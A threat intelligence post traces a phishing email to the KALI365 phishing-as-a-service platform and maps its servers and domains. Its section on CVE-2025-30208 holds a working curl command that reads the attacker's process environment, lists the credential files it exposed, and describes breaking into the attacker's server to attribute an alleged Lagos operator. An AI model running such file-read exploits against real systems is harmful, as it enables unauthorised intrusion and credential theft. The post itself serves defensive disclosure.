DISCLAIMER: This investigation was conducted on behalf of a corporate client who received the phishing attack described in this post. The scope of active investigation was limited to infrastructure directly used in the attack against our client. CVE-2025-30208 was demonstrated against the attacker's server solely to identify the operator's management IP address as part of attributing the attack on our client - no data was exfiltrated, modified, or weaponized, and findings were reported immediately to the relevant abuse contacts and law enforcement channels. All unauthenticated endpoints referenced were accessed in their public capacity, equivalent to standard HTTP requests. OSINT collection was performed entirely via passive and open sources (WHOIS, certificate transparency logs, public DNS, internet-wide banner scanning platform data, publicly served web resources, sandbox analysis reports, and public threat intelligence feeds). This post is published as a threat intelligence disclosure in the public interest to assist defenders and inform takedown efforts.
A phishing email landed in an employee's inbox. SPF passed. DKIM passed. DMARC passed. Spam score: 0.085/1.0.
What started as a routine triage turned into a multi-day offensive hunt that leveraged and arbitrary file read on the threat actor's server as root to uncover 9 servers across 11 operator domains, 26+ customer phishing domains enumerated, 8,561+ live victim sessions counted in real time across two independent backends, and a Starlink subscriber in Lagos, Nigeria hiding itself behind a previously undocumented Phishing-as-a-Service platform called KALI365.
We are not Jack Rhysider and this is the story of a dive in a dark corner of the Internet.
1. The Email That Started Everything
The sending IP resolved to the victim firm's real email gateway. This hinted at a genuine account comprime - the attacker was sending from the firm's real infrastructure, every authentication check passed and it was normal : it was "legitimate" mail.
SPF: PASS (sent from firm's own relay)
DKIM: PASS (signed with firm's private key)
DMARC: PASS (policy=reject - irrelevant when the account is owned)
Spam: 0.085 / 1.0
The kill chain had three stages, each designed to defeat a specific class of detection.
Stage 1 - Instapage lure. A free-tier landing page registered approximately one hour before delivery. First-hop URL scanning sees a legitimate Instapage domain and stops. A Snowplow analytics beacon fired on page load - filetering the connections on the intended target's timezone (Europe/Zurich) and language (de-CH) before the redirect. The attacker profiled their target geographically before delivering the payload.
Stage 2 - Cloudflare Worker AiTM proxy. The redirect target was a Cloudflare Worker subdomain. It's TLS certificate was issued the day before the attack - an on-demand, zero-day infrastructure. Extracting the Worker's JavaScript revealed the complete AiTM state machine:
const SID = "841402";
const API = "https://api.duemineral.uk:8443";
const SPATH = "/api/session/";
async function pollStatus(sid) {
const r = await fetch(`${API}${SPATH}${sid}`);
const d = await r.json();
if (d.status === "captured") redirect(d.redirect_url);
}
The variable API pointing to api.duemineral.uk:8443 was the thread we started pulling on.
Stage 3 - Session token theft. The Worker proxied the victim's Microsoft authentication in real time. The Victim completes MFA → our attacker intercepts the post-authentication session cookie → The MFA is bypassed entirely. Social engineering hints in the content reinforced it: "Open it in the same browser where you are logged into your email" - ensuring the active session cookie was captured, not just a fresh login token.
2. Mapping the Infrastructure
Subdomain enumeration was done by using certificate transparency. It returned 38 subdomains under duemineral.uk - all of them phishing lures for Outlook, Google Accounts, YouTube, Google Play, SharePoint, Azure AD, all routing through Cloudflare via wildcard DNS (*.duemineral.uk).
The CDN bypass. A single DNS record broke everything:
direct.duemineral.uk. IN A 167.99.0.116
This A record pointed directly to the origin server, bypassing Cloudflare's entire WAF, DDoS protection, bot management, and rate limiting stack. Every protection - defeated with a single DNS lookup.
JS bundle reverse engineering. The React 19 frontend (527KB) compiled bundle yielded 68 API endpoints. All High-value surveillance points for us:
POST /dash/my-worker/setup → Cloudflare Worker deploy (RCE)
POST /dash/ai-template → LLM template generation (SSTI candidate)
POST /dash/linked-domains/provision-ssl/{id} → SSL provisioning (command injection)
POST /dash/mfa/scan → MFA enumeration (SSRF candidate)
GET /dash/branding → Unauthenticated - returns theme + accent colors
GET /health → Unauthenticated - live platform metrics
POST /register → Unauthenticated - live storefront
Server fingerprint (origin 167.99.0.116, extracted passively):
OS: Ubuntu 24.04.3 LTS
Python: 3.12.3
Node.js: v20.20.2
nginx: 1.24.0 (Ubuntu)
App: Flask 3.1.8 / Gunicorn (port 5001)
Frontend: React 19.2.4 + Vite (dev server on port 3000) + TailwindCSS
Database: SQLite (WAL mode, confirmed via /health) + Redis
TLS: Self-signed wildcard *.loadingdocuments.uk (10-year validity)
Runs as: root | Working dir: /root/panel-v2/
Screen: STY=134345.panel
NODE_ENV: development ← production server running in dev mode
Shodan InternetDB on 167.99.0.116: Flask/3.1.8, Python/3.12.3, nginx - 12 CVEs flagged against this fingerprint.
The origin server ran a TCP tarpit - all 65,535 ports completed SYN handshakes but dropped data, rendering port scanning useless. Only 6 ports had real services behind them.
Threat intelligence on the domain:
- urlscan.io -
duemineral.uk: 81 scans since 2026-02-28; 20+ Cloudflare Workers delivery subdomains identified; first scan:2026-02-28 - urlscan.io -
loadingdocuments.uk: 32 scans; page titleKALI365captured on first scan2026-03-25before branding was applied - Gridinsoft -
auth.duemineral.uk: blacklisted phishing, trust score 10/100
Joe Sandbox - confirmed campaigns:
| Sample | Infrastructure | Lure | Target |
|---|---|---|---|
auth.duemineral.uk/l/G-5xTKrYcI8 | KALI365 device code | Adobe Acrobat Sign | Marubeni America Corporation |
auth.loadingdocuments.uk/l/Oc0OuelwEt0 | KALI365 device code | SharePoint impersonation | - |
Sender in first Joe Sandbox sample: "Katou Kenny" - of course a spoofed identity. The Target was confirmed as being Marubeni America Corporation (The US subsidiary of a Fortune 500 Japanese trading company).
3. CVE-2025-30208: Arbitrary File Read as Root to gain more data
Port 3000 ran a broken Vite development server. A required module chunk (dist/node/chunks/dist.js) was missing from node_modules - the module loader crashed on every request hitting the transform pipeline. But simpler file handlers remained alive.
CVE-2025-30208: the ?import&raw?? query suffix bypasses Vite's server.fs.allow path restriction. The double ?? creates URL parsing ambiguity the access check doesn't account for. Process running as root. Every file readable by root - readable via HTTP:
curl -s "http://167.99.0.116:3000/@fs/proc/self/environ?import&raw??"
# export default "USER=root\x00SSH_CLIENT=135.129.124.63 26970 22\x00
# STY=134345.panel\x00PWD=/root/panel-v2\x00EDITOR=vi\x00
# NODE_ENV=development\x00..."
/proc/self/environ - the operator was actively SSH'd in at time of extraction:
USER=root
SSH_CLIENT=135.129.124.63 26970 22 ← operator's egress IP, port, destination
STY=134345.panel ← screen session named "panel"
PWD=/root/panel-v2 ← confirmed working directory
EDITOR=vi
NODE_ENV=development
Files confirmed present on the server (path enumeration):
/root/server.py Flask source - SECRET_KEY, DB URI
/root/.ssh/id_rsa SSH private key
/root/.bash_history Full operator command history
/root/.env Environment secrets
/root/panel-v2/.env.production Production config
/etc/mongod.conf MongoDB bind/auth config
/etc/systemd/system/panel.service Service definition
4. Unauthenticated Intelligence: Live Platform Telemetry
No authentication required on either /health endpoint. Live data from both backends:
api.duemineral.uk (main): 162.243.166.119:5001 (second backend):
status: "degraded" status: "healthy"
active_tokens: 5,941 active_tokens: 2,620
revoked_tokens: 1,978 revoked_tokens: 1,764
cpu.cores: 2 cpu.cores: 4
cpu.load_1m: 4.28 (warning) cpu.load_1m: 0.0 (idle)
wal.size_mb: 0.0 wal.size_mb: 0.0
threads: 41 threads: 21
schema: v1 schema: v2 (adds disk, memory, error_rate)
active_tokens on the main backend increased between two readings 14 minutes apart - live campaigns in progress. wal: 0.0 on both confirms SQLite Write-Ahead Log (WAL checkpointed clean). The second backend on 162.243.166.119:5001 runs a newer health schema version (v2) with additional system metrics - confirms it runs more recent KALI365 code.
Combined active stolen sessions: 5,941 + 2,620 = 8,561+ tokens across two independent databases.
/dash/branding - unauthenticated, returns operator theme config:
{"accent_color": "#ff0a3c", "panel_name": "Panel", "primary_color": "#ff0a3c", "theme": "crimson"}
... well well well let's call that destiny then...
/register - unauthenticated HTTP 200 on both backends. Live storefront, no referral required.
5. Operator Attribution
SSH Egress IP: 135.129.124.63
Reverse DNS: customer.lgosnga1.isp.starlink.com
ISP: SpaceX Services, Inc. - Starlink
ASN: AS14593 (SPACEX-STARLINK)
NetHandle: NET-135-129-124-0-1
NetName: STARLINK-863719539772915747-RW-LGOSNGA1-IPV4
CIDR: 135.129.124.0/24
Registered: 2023-06-16
BGP routing: First appeared 2023-07-26 (fully visible, 329/329 RIS peers)
NetName fully decoded:
| Segment | Meaning |
|---|---|
STARLINK | Starlink network prefix |
863719539772915747 | SpaceX internal subscriber/terminal ID - maps to a specific Starlink dish and account |
RW | Read-Write allocation (standard residential) |
LGOSNGA1 | LaGOS, NiGeria, Accounting zone 1 - Lagos Starlink ground station node |
IPV4 | Address family |
LGOSNGA1 = Lagos, Nigeria - authoritative geographic confirmation independent of GeoIP databases.
Geolocation cross-reference - all sources confirm Lagos:
| Source | City | Lat | Lon | Note |
|---|---|---|---|---|
| ip-api.com | Lagos, NG | 6.5243 | 3.3792 | Confirmed |
| ipinfo.io | Lagos, NG | 6.4541 | 3.3947 | Confirmed |
| Pulsedive | Lagos, NG | 6.4474 | 3.3903 | Confirmed |
| DNS hostname | - | - | - | lgosnga1 = Lagos Nigeria node 1 (authoritative) |
| AlienVault OTX | USA | 37.751 | -97.822 | Wrong - OTX uses SpaceX HQ (CA), not subscriber location |
Coordinates cluster in the Yaba / Surulere / Lagos Island corridor - central/mainland Lagos.
Threat intelligence on 135.129.124.63:
| Source | Result | Detail |
|---|---|---|
| Blocklist.de | LISTED | Added 2025-07-23; retired 2025-10-25; abuse category |
| s5h.net (all.s5h.net) | LISTED | Port scanning behavior observed against honeypots |
| Spamhaus PBL (zen.spamhaus.org) | Listed | 127.0.0.10 - consumer/residential (expected for all Starlink, not specific abuse) |
| Pulsedive | MEDIUM risk | Ingested from Blocklist.de feed; first seen 2025-07-23 |
| GreyNoise | Clean | Not observed scanning internet - consistent with SSH management use only |
| Shodan InternetDB | No data | No open ports indexed (CGNAT, expected for Starlink) |
| AlienVault OTX | Partial | HTTP probe 2025-07-23 returned HTTP 0 - no web server (SSH-only egress confirmed) |
| CIRCL Passive DNS | Clean | No records |
| crt.sh | Clean | No certificates |
| Wayback Machine | Clean | No snapshots |
Adjacent IP activity (same /24):
135.129.124.20: OTX Pulse - Mirai Telnet scan (2024-06-30) + ETIC Cybersecurity port scan (2024-07-04). Confirms the /24 block has been used by multiple subscribers, consistent with Starlink's residential pool assignment.
Intelligence timeline for 135.129.124.63:
| Date | Event |
|---|---|
| 2023-06-16 | /24 LGOSNGA1 block registered by SpaceX |
| 2023-07-26 | /23 prefix enters global BGP routing (329/329 RIS peers) |
| 2024-06-30 | Neighbor .20 - OTX Mirai Telnet scan pulse |
| 2025-07-23 | .63 first seen - Blocklist.de, Pulsedive, OTX HTTP probe |
| 2025-10-25 | Pulsedive retires IP (no recent activity observed) |
| 2025-12 | RaccoonO365 arrests - Lagos & Edo, Nigeria (Okitipi Samuel) |
| 2026-01-08 | /24 prefix appears as individual BGP route |
| 2026-04-08 | IP confirmed as KALI365 operator SSH egress via CVE-2025-30208 |
Law enforcement subpoena path: SpaceX Services, Inc., 1 Rocket Rd, Hawthorne, CA 90250. Reference NetHandle: NET-135-129-124-0-1 and subscriber ID 863719539772915747. SpaceX maps this to a specific terminal account, billing address, and physical dish location. The operator's real identity is one subpoena away.
Operator Handle: clicksideas
Infrastructure scan identified clicksideas.com resolving to the same DigitalOcean IP as the active KALI365 server (146.190.33.201). Reverse DNS on the active server points to this domain. The operator failed to isolate their personal domain from criminal infrastructure.
Domain: clicksideas.com
Registered: 2022-01-23
Registrar: Namecheap, Inc.
Nameservers: ns1/ns2/ns3.digitalocean.com
Site: WordPress blog
Author: "clicksideas" (single author)
Resolves to: 146.190.33.201 (current KALI365 production server)
Wayback Machine (earliest snapshot: 2019): clicksideas.com was a ClickBank affiliate landing page promoting "Commission Hero" by Robby Blanchard - a mass-market online money scheme. This is the classic Nigerian internet fraud pipeline: affiliate scam → skill development → PhaaS operator. Seven years from first ClickBank page to commercial PhaaS with 8,500+ active stolen sessions.
Platform Identity: KALI365
- Name confirmed: urlscan.io captured page title
KALI365on first ever scan ofloadingdocuments.uk/login(2026-03-25) before branding was applied - Version confirmed: Working dir
/root/panel-v2/= second major version; screen session134345.panel - No public designation: No Microsoft Storm-XXXX, no Proofpoint TA number, no Mandiant/CrowdStrike/Recorded Future reporting. Push Security (April 2026) catalogued
duemineral.uk/loadingdocuments.ukunder internal codename "CLURE" - without operator attribution or country of origin.
Domain Registration Fingerprints
We found three distinct false identity patterns across 11 operator domains:
| Pattern | Domains | Registrar |
|---|---|---|
| Nominet validation FAILED | duemineral.uk, antired.uk, loadingdocuments.uk | Cloudflare, Inc. |
Registrant Org: "education" | sharedocpdf.work, pdfdrive.work | Cloudflare, Inc. |
| Privacy-protected / redacted | All others | NameSilo, Namecheap, Wild West Domains |
Nominet message on all three .uk domains: "Nominet was not able to match the registrant's name and/or address against a 3rd party source." Consistent, deliberate false identity across every registration.
6. Full Infrastructure: 9 Servers, 11 Domains, 2 Panel Versions
An internet-wide banner scanning using the panel's unique HTTP fingerprints expanded the known infrastructure from 2 IPs to 9:
Complete server inventory:
| IP | Provider | Ports Confirmed | Role | Status |
|---|---|---|---|---|
167.172.199.98 | DO Santa Clara AS14061 | 80 (nginx), 2082 (nginx), 5001 (Werkzeug dev) | Dev origin / old panel | Active |
134.209.55.33 | DO Santa Clara AS14061 | 8085, 8443 | Terminal v2.0 (dev/customer) | Active |
24.199.108.217 | DO Santa Clara AS14061 | 8085, 8443 | Terminal v2.0 / antired.uk | Active |
157.230.53.233 | DO North Bergen AS14061 | 80, 443, 8443 (cert 15af977c) | Old panel node | Offline |
162.243.166.119 | DO North Bergen AS14061 | 2082 (nginx), 5001 (gunicorn), 8443 (cert 15af977c) | Active 2nd backend | Active |
159.223.147.230 | DO North Bergen AS14061 | 80, 443 (cert 15af977c) | Panel node | Active |
167.99.0.116 | DO North Bergen AS14061 | 80, 443, 2082, 8443 - offline Apr 8 | Exploited main server | Offline |
146.190.33.201 | DO Santa Clara AS14061 | 22 only (tarpitted) | Current production | Active |
172.86.72.83 | RouterHosting/Cloudzy AS14956, Dallas TX | 8443 | New node - bulletproof host | Active |
Eight servers on DigitalOcean AS14061. One outlier: 172.86.72.83 on RouterHosting LLC (Cloudzy) - bulletproof-friendly hosting. Shared TLS certificate (SHA1: 15af977ce25de452b96affa2addb1036) confirmed across 167.99.0.116, 162.243.166.119, 157.230.53.233, 159.223.147.230 - single-operator cluster. Port 5001 (Flask/Gunicorn backend) exposed directly on 162.243.166.119 and 167.172.199.98 without nginx proxy - architectural misconfiguration mirroring the Vite dev server exposure.
Live TLS certificate extraction:
167.172.199.98:8443 → ZeroSSL, CN=panel.duemineral.uk
SHA1: 14:9B:76:03:99:9F:DD:77:86:3F:ED:DD:79:12:8E:5B:E7:25:5B:75
Issued: 2026-02-28 (duemineral.uk registration date - day one)
Expires: 2026-05-29
24.199.108.217:8443 → Let's Encrypt E7, CN=panel.antired.uk
SHA1: A5:F4:8F:6B:29:F0:C5:51:23:14:47:DC:AC:5B:08:E4:5C:41:70:B2
Issued: 2026-03-30, Expires: 2026-06-28
159.223.147.230:443 → Self-signed, CN=proxy
SHA1: 59:83:55:D0:C0:BD:D4:70:4A:53:E9:0E:64:94:39:8B:6E:CF:63:3C
Issued: 2026-04-02, Expires: 2036-03-30 (10-year)
Two Distinct Panel Versions
Crimson Panel (v1) - 3,005 bytes (or 3,001 bytes with custom branding), nginx, ports 80/443/2082. Minimal dark UI, Inter font, bright red accent #ff0a3c, footer: "AUTHORIZED PERSONNEL ONLY". The operator-facing SaaS panel. Content-length sub-variant: servers showing "KALI365" title (3,005 bytes) vs. "Panel" title (3,001 bytes) - operator-configurable panel_name field. Same FOFA body hash, 4-byte difference.
Terminal (v2.0) - 12,375 bytes, Werkzeug/Python direct, ports 8085/8443. Full hacker-terminal aesthetic: black background, #ff0033 red + #00ff41 green, JetBrains Mono + Share Tech Mono + VT323 + IBM Plex Mono, animated CRT scanlines, CSS glitch effects, @keyframes flicker + @keyframes spin. Title: KALI365 // Login. Footer: "KALI365 v2.0 // ENCRYPTED CONNECTION". Input labels: user@root / passkey / [ AUTHENTICATE ]. CSS contains full application shell (.sidebar, .stats-row, .stat-box, .card) - complete operator dashboard, not just a login page. This is the next-generation version under active development.
Third Domain - antired.uk - Discovered via TLS Pivot
Registered: 2026-03-01 (Cloudflare, Nominet FAILED)
IP: 24.199.108.217 (DigitalOcean, Santa Clara)
Subdomains (CT logs, all issued 2026-03-01):
panel.antired.uk ← operator dashboard
login.antired.uk ← phishing delivery
vn3hg.antired.uk ← campaign-specific subdomain
www.antired.uk
vn3hg - campaign-specific subdomain appearing on both vn3hg.duemineral.uk and vn3hg.antired.uk. The same campaign identifier across two separately registered domains under two different TLS certificate authorities. Near-certain cross-domain operator link.
7. Complete Domain Intelligence (11 Operator Domains)
| Domain | Registered | Registrar | Registrant Org | IP | Notes |
|---|---|---|---|---|---|
sharedocpdf.work | 2026-02-23 | Cloudflare | "education" | 167.172.199.98 | Earliest known; react. + office. subdomains |
pdfdrive.work | 2026-02-25 | Cloudflare | "education" | 134.209.55.33 | panel/login/acc/live subdomains |
duemineral.uk | 2026-02-28 | Cloudflare | Nominet FAILED | 146.190.33.201 | Primary SaaS panel; 81 urlscan hits |
antired.uk | 2026-03-01 | Cloudflare | Nominet FAILED | 24.199.108.217 | Discovered via TLS cert; vn3hg campaign link |
loadingdocuments.uk | 2026-03-20 | Cloudflare | Nominet FAILED | 146.190.33.201 | Panel titled "KALI365" on first scan; 32 urlscan hits |
deculvers.com | 2026-03-24 | Wild West Domains | Redacted | 172.86.72.83 (Cloudzy) | NS: NS1.BDM.MICROSOFTONLINE.COM - Microsoft-lookalike |
creaee.online | 2026-03-25 | Namecheap | Redacted | 162.243.166.119 | Port 2082 |
dpcusginmein.online | 2026-03-25 | Namecheap | Redacted | 162.243.166.119 | Port 2082 |
clicksideas.com | 2022-01-23 | Namecheap | Redacted | 146.190.33.201 | Operator personal domain; WordPress; 2019 ClickBank affiliate |
8. Threat Actor Timeline
2019
└── clicksideas.com first snapshot (Wayback Machine)
ClickBank affiliate page - "Commission Hero" money scheme
Classic Nigerian internet fraud pipeline entry point
2022-01-23
└── clicksideas.com re-registered (Namecheap / DigitalOcean nameservers)
WordPress blog, author: "clicksideas"
Skill development period begins - 4 years before PhaaS launch
2026-02-23
└── sharedocpdf.work registered (Cloudflare, Org: "education")
CT certs: office.sharedocpdf.work, react.sharedocpdf.work → 167.172.199.98
→ EARLIEST KNOWN ACTIVITY - React frontend dev environment live
2026-02-25
└── pdfdrive.work registered (Cloudflare, same "education" org)
CT certs: panel, login, acc, live, account → 134.209.55.33
→ Full panel structure deployed 3 days before public launch
2026-02-27
└── Three DigitalOcean droplets spin up simultaneously
167.172.199.98, 24.199.108.217, 134.209.55.33 (all DO Santa Clara)
KALI365 v2.0 Terminal panel on ports 8085/8443
→ Final testing phase
2026-02-28
└── duemineral.uk registered (Cloudflare, Nominet FAILED)
ZeroSSL cert issued for panel.duemineral.uk → 167.172.199.98 (day one)
→ Platform goes live as commercial SaaS
2026-03-01
└── antired.uk registered (Cloudflare, Nominet FAILED)
CT certs: panel.antired.uk, login.antired.uk, vn3hg.antired.uk
→ Second delivery domain; vn3hg campaign ID bridges to duemineral.uk
2026-03-20
└── loadingdocuments.uk registered (Cloudflare, Nominet FAILED)
Self-signed wildcard *.loadingdocuments.uk - 10-year validity
panel.loadingdocuments.uk operator panel goes live
2026-03-24/25
└── deculvers.com registered (Wild West Domains)
NS: NS1.BDM.MICROSOFTONLINE.COM (Microsoft-lookalike nameservers)
creaee.online + dpcusginmein.online registered (Namecheap)
→ 162.243.166.119 (new North Bergen NJ IP) joins infrastructure
2026-03-25
└── urlscan.io first scan of loadingdocuments.uk/login
Page title captured: "KALI365" - platform name leaked before branding applied
duemineral.uk moves behind Cloudflare CDN (104.21.0.217)
www.duemineral.uk briefly on 167.172.199.98 before CF migration complete
2026-03-27 to 2026-03-31
└── Mass customer domain registrations begin (NameSilo + DNSOWL pattern):
taskflowscripts.com, myappsharepoint-doc.com, kylianiz654.com,
documentsalived.com (all Mar 27); sharehubcom.com (Mar 28);
constrnet.com, concentrateofficeguadmins.org, mscontactmembersheardliners.com,
duanemorrisadwateralchemyarchenterrureaudet.com, 00085.icu (Mar 31)
→ Customer acquisition wave; 22+ domains deployed to old server
2026-04-01 to 2026-04-07
└── infoqueer.org, sharei9s.biz (Apr 1)
159.223.147.230 gets self-signed "proxy" cert (Apr 2)
365securefiles.org registered (Apr 4)
Cloudflare Worker cert issued: web-secure-c0k3.p-4mq7w20w.workers.dev (Apr 6)
→ Day before phishing email delivery
2026-04-07
└── Phishing email delivered to victim
Invoice template, sent from compromised Sophos-relayed account
Kill chain: Instapage (profiling) → CF Worker (AiTM) → api.duemineral.uk:8443
2026-04-08 (morning)
└── CVE-2025-30208 exploitation on 167.99.0.116
/proc/self/environ read: operator SSH egress = 135.129.124.63
IP resolves to: customer.lgosnga1.isp.starlink.com → Lagos, Nigeria
2026-04-08 (evening)
└── Operator detects reconnaissance
Emergency migration: 167.99.0.116 → 146.190.33.201 (new DO droplet)
Vite dev server NOT re-exposed (understood the attack vector)
12+ API endpoints removed, partial input validation added
OpenSSH on new server: ubuntu13.13 (older than compromised server ubuntu13.15)
deculvers.com cert issued → 172.86.72.83 (RouterHosting/Cloudzy Dallas)
→ First infrastructure node outside DigitalOcean
22 customer domains left pointing at offline 167.99.0.116 - every customer dark
2026-04-10
└── Re-enumeration of new server 146.190.33.201:
api.duemineral.uk/health: 5,941 active tokens, status: degraded
/register open - $250/mo via OxaPay (no referral required)
panel.loadingdocuments.uk - operator subdomain confirmed live
159.223.147.230 - active panel node (North Bergen NJ) confirmed
2026-04-11
└── Banner scanning: 9 total IPs, 11 operator domains (was 2 known)
162.243.166.119:5001/health: 2,620 additional active tokens, status: healthy
Combined total: 8,561+ active stolen sessions across two backends
26+ customer domains enumerated; 22 orphaned on dead server
Shared cert 15af977c confirmed across 4 IPs (single-operator cluster)
deculvers.com (Cloudzy) - first non-DigitalOcean node
Earliest activity: 2026-02-23 (sharedocpdf.work)
This report published
9. The Nigerian PhaaS Ecosystem: Where KALI365 Fits
KALI365 did not emerge in isolation. It belongs to a documented and expanding ecosystem of Nigerian-operated or Nigeria-adjacent PhaaS platforms targeting Microsoft 365.
RaccoonO365 - It's most direct predecessor. It used to be Operated by Okitipi Samuel (a.k.a. Moses Felix), in the Lagos and Edo states, in Nigeria and sold over Telegram. Microsoft seized 338 associated domains in September 2025. The Nigerian Police Force / NCCC arrested Okitipi Samuel in December 2025, leading to the fall of RaccoonO365. KALI365 then launched in February 2026, only two months after the arrest. The IP 135.129.124.63 first appeared in threat intelligence feeds in July 2025 - during the peak of RaccoonO365's operations. This is circumstantial, not conclusive, but the timing and geography are fitting.
EvilTokens - First Documented by Sekoia TDR in March 2026, it provides Device code phishing and AiTM with a subscription model and AI-generated templates. It's Operator handle is eviltokensadmin. It deviates technically from KALI365 by using: a PHP frontend (vs Python/Flask), Railway PaaS hosting (vs DigitalOcean), NOWPayments (vs OxaPay), the entry ticket is $1,500 then $500/month (vs $250/month), had a public Telegram channel (KALI365 has none found). Different codebase, same technique class. Both tried to fill the market void created by RaccoonO365's takedown.
Storm-2372 - Named by Microsoft MSTIC (February 2025), It provides Device code phishing and seems to be Russia-aligned, SVR-adjacent. It seems to be targetting Governments and diplomatic entities and is not financially motivated. Technique overlap only - entirely different operator profile and motivation.
TA2723 - Named by Proofpoint (October 2025). Financially motivated device code phishing. Country of origin unconfirmed. Active since October 2025.
SilverTerrier - Unit 42 (documented since 2014). Nigerian BEC group. No device code phishing overlap. Predates the AiTM era. Consistent TTP profile at the macro level (Nigerian origin, Microsoft targeting, consumer ISP egress).
KALI365 - unattributed, undocumented. No vendor formal designation. Push Security's April 2026 analysis of ten competing device code phishing kits catalogued this infrastructure under the internal codename "CLURE" without operator attribution or country of origin. The platform has operated for two months, collected 8,561+ victim tokens, served 26+ customer deployments, and built across 9 servers - entirely under the radar of the major threat intelligence vendors. The 37x surge in device code phishing in early 2026 created an environment where smaller, well-operated platforms run below vendor detection thresholds - particularly without a public Telegram channel to surface them.
10. Platform Capabilities and Active Victims
Business model:
- Pricing: $250/month or $2,000/year
- Payment: OxaPay (crypto-only, no KYC) - merchant ID
11153123 - Activation: OxaPay payment webhook fires → account created
- No referral code required - open registration
Phishing technique: OAuth 2.0 device code flow abuse + AiTM token theft. Server generates Microsoft device authentication codes. Victim enters code at microsoft.com/devicelogin → grants attacker a persistent OAuth refresh token. No password captured. MFA irrelevant. Token valid until revoked or expiry.
8 built-in phishing templates (extracted from React 19 JS bundle):
| Template | Subject Line |
|---|---|
| SharePoint | {{sender_name}} shared a document with you |
| OneDrive | {{sender_name}} shared a file with [[name]] via OneDrive |
| Teams | {{sender_name}} mentioned you in a Teams chat |
| Voicemail | You received a voicemail from {{sender_name}} |
| DocuSign | {{sender_name}} sent you a document to sign |
| Invoice | Invoice for [[company]] - Payment Due [[date]] |
| Adobe Sign | [[name]], agreement awaiting your signature |
| Security Alert | Security alert for [[email]] |
The phishing email that opened this investigation matched the Invoice template exactly.
Confirmed victim organization: Marubeni America Corporation (from Joe Sandbox public analysis - Adobe Acrobat Sign device code lure, sender identity "Katou Kenny").
Lure brands supported: Microsoft 365, SharePoint, OneDrive, Teams, Azure AD, Outlook, Google Accounts, YouTube, Google Play, DocuSign, Adobe Acrobat Sign.
Delivery infrastructure: Cloudflare Workers (AiTM proxy) - each customer deploys their own Worker subdomain. Known customer Workers: papastrious.workers.dev, sureplugmarket.workers.dev, bdeda974c99320a3040456b8.workers.dev, p-mz12fq2s.workers.dev.
MITRE ATT&CK mapping:
| Technique | ID |
|---|---|
| Phishing: Spearphishing Link | T1566.002 |
| Adversary-in-the-Middle (AiTM token theft) | T1557 |
| Compromise Infrastructure: Serverless (CF Workers) | T1584.007 |
| Acquire Infrastructure: Domains | T1583.001 |
| Stage Capabilities: Digital Certificates | T1587.003 |
| Compromise Infrastructure: Web Services (victim site injection) | T1584.006 |
| Obtain Capabilities: PhaaS | T1588 |
| Acquire Infrastructure: VPS | T1583.003 |
| Valid Accounts (SSH operator access) | T1078 |
| Command and Control via SSH | T1021.004 |
11. Customer Infrastructure (26+ Domains)
Customer registration pattern: NameSilo registrar + DNSOWL nameservers. All registered March 27 – April 7, 2026. All pointed to 167.99.0.116 at time of scanning.
Unintended disruption: The operator's emergency migration on April 8 was executed without updating any customer DNS records. 22 of 26 verified customer domains still resolve to offline 167.99.0.116. Every customer's phishing panel went dark simultaneously. The operator prioritized their own escape over their customers' operations.
| Domain | First Seen | Category |
|---|---|---|
taskflowscripts.com | 2026-03-27 | Document/workflow lure |
myappsharepoint-doc.com | 2026-03-27 | SharePoint impersonation |
kylianiz654.com | 2026-03-27 | AiTM phishing |
documentsalived.com | 2026-03-27 | Document delivery lure |
sharehubcom.com | 2026-03-28 | Microsoft SharePoint |
constrnet.com | 2026-03-31 | Corporate impersonation |
concentrateofficeguadmins.org | 2026-03-31 | Office admin lure |
mscontactmembersheardliners.com | 2026-03-31 | Microsoft contact impersonation |
duanemorrisadwateralchemyarchenterrureaudet.com | 2026-03-31 | Duane Morris (AmLaw 100) - legal sector targeting |
00085.icu | 2026-03-31 | AiTM phishing |
infoqueer.org | 2026-04-01 | AiTM phishing |
sharei9s.biz | 2026-04-01 | AiTM phishing |
noboundseyetech.com | ~2026-03 | Microsoft Teams / SharePoint |
365securefiles.org | 2026-04-04 | Microsoft 365 file share |
ms-teamsmeeting.top | ~2026-03 | Microsoft Teams |
solumvp.sbs | ~2026-03 | Device code phishing |
ctcafinancial.com | ~2026-03 | Financial org impersonation |
natmanco.com | ~2026-03 | Corporate impersonation |
democrakidsradio.org | ~2026-03 | Microsoft login |
powwowavents.cc | ~2026-03 | AiTM phishing |
sedoasiis.com | ~2026-03 | AiTM phishing |
bookingservicestwo.sbs | ~2026-03 | Booking service lure |
nikadent.icu | ~2026-03 | AiTM phishing |
yakaclicker.com | ~2026-03 | DocuSign (DNS → O2Switch France - separate host) |
verifyoff36s5hareddocauthby.biz | ~2026-03 | Document verification |
foldersrunningpress.run | ~2026-03-31 | AiTM phishing |
bonearte.com.br | - | Legitimate Brazilian clothing company - hijacked |
adobeonlinedocauth.danaevasilis.gr | - | Legitimate Greek website - hijacked |
duanemorrisadwateralchemyarchenterrureaudet.comconcatenates "Duane Morris" (major US law firm, ~800 lawyers) with other company names - deliberate legal sector targeting.
12. The Operator Reacts
They noticed. Within hours of CVE-2025-30208 exploitation:
- New DigitalOcean droplet provisioned (
146.190.33.201, Santa Clara) direct.duemineral.ukA record updated- Old server
167.99.0.116taken offline - Vite dev server not re-exposed - they understood the attack vector
- OpenSSH on new server:
ubuntu13.13- older patch level than the server they fled (ubuntu13.15) - 12 API endpoints removed, partial input validation added
/healthendpoint not removed - still leaking live victim counts/registernot removed - storefront still openclicksideas.comstill resolves to new server IP - personal domain still cross-contaminating criminal infrastructure- 22 customer domains not updated - every paying customer's panel went dark with zero notice
New server also spawned a second independent backend on 162.243.166.119:5001 - healthy, 4-core, 2,620 active tokens - suggesting the operator is rebuilding capacity in parallel.
13. Takeaways for Defenders
AiTM makes most MFA deployments irrelevant. The attacker intercepts the session token after MFA completes. Only FIDO2/WebAuthn with domain origin binding (rpId) prevents this - the hardware key refuses to sign for a proxied domain. Conditional Access policies requiring compliant devices add a second barrier. Everything else - TOTP, SMS, push apps - is bypassable by AiTM.
When the sender is owned, email authentication means nothing. SPF/DKIM/DMARC all passed because the account was genuinely compromised from a prior AiTM campaign. This email was stage N+1 of an ongoing supply chain. Detection requires behavioral analysis: unusual sending patterns, geolocation anomalies, new device logins, off-hours access - not header verification.
A Starlink NetHandle contains a law enforcement subpoena path. STARLINK-863719539772915747-RW-LGOSNGA1-IPV4 - the ID 863719539772915747 is SpaceX's internal identifier for a specific terminal account in Lagos. Reference NET-135-129-124-0-1 in a subpoena to SpaceX Services, Inc. (1 Rocket Rd, Hawthorne, CA 90250). The operator's real identity is one legal process away.
